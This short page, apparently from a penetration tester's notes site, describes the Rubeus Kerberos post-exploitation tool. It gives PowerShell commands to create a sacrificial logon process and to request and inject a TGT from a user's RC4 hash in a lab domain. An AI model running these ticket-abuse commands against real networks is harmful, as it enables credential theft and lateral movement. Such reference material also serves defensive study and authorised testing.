Rubeus

Rubeus (Invoke-Rubeus.ps1) is a post-exploitation tool for interacting with Kerberos on Windows. It enables ticket extraction, ticket creation (Pass-the-Ticket), ticket granting (Ask TGT/TGS), and abuse of Kerberos features like unconstrained delegation and Kerberoasting.

TGT

# Create a sacrificial process
Import-Module .\Invoke-Rubeus.ps1
Invoke-Rubeus -Command 'createnetonly /program:powershell.exe /show'

# Get a TGT as x7331
Invoke-Rubeus -Command 'asktgt /user:x7331 /rc4:948575451312938596ac1f7f7d33877e /domain:marvel.local /ptt'

PreviousResponder NextRunas

Last updated 18 days ago

hashtagTGT

TGT